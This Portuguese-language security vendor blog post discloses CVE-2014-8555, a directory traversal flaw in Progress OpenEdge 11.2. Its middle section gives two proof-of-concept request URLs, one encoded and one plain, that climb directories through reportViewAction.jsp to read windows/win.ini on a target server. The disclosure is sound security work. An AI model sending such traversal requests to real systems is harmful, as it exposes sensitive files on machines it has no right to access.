CVE-2014-8555 Progress OpenEdge 11.2 – Directory Traversal

OpenEdge11.2_Directory_Traversal

Ao analisarmos a aplicação OpenEdge, identificamos algumas vulnerabilidades, após algumas tentativas de contato com a empresa sem sucesso decidimos por esperar a empresa lançar novas versões da aplicação para podermos divulgar as falhas, pois algumas podem ser utilizadas para o acesso indevido a arquivos sensíveis de computadores que utilizam a aplicação.


Seu website está sob-ataque? Contrate nosso WAF!

Descrição da plataforma segundo o website do fabricante

O OpenEdge da Progress é a plataforma completa de desenvolvimento de aplicações, para construir aplicações de negócios dinâmicas e baseado em processos de negócios, para implementação segura em qualquer plataforma, qualquer dispositivo móvel e qualquer Cloud.

Interface web da aplicação

OpenEdge11.2_index

A falha de segurança

# Software: Progress OpenEdge
# Versão: 11.2
# Empresa: Progress Software
# Website: www.progress.com
# Vulnerabilidade: Directory Traversal
# CVE: CVE-2014-8555
# Autor: Mauricio Corrêa

O usuário malicioso envia uma requisição mal formada que gera o acesso de arquivos subindo diretórios da seguinte forma:

http://IP_do_Alvo:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

ou então

http://IP_do_Alvo:9090/report/reportViewAction.jsp?selection=../../../../../../../../../../windows/win.ini

Onde a aplicação retorna informações do arquivo, conforme demonstramos na imagem a seguir:

OpenEdge11.2_Directory_Traversal



Gostou do artigo? Compartilhe.

Share on linkedin
LinkedIn
Share on facebook
Facebook
Share on whatsapp
WhatsApp
Quer proteger seu website e seus dados na web?
Clique e saiba mais
Economize até 25% em TI
Diminua seus custos com infraestrutura em TI, e garanta buscas de falhas de segurança.
Clique e saiba mais
Antecipe falhas de segurança
Teste seus ativos com uma solução altamente confiável.
Clique e saiba mais
Previous
Next

Pesquisar no Blog

Faça parte da nossa lista de emails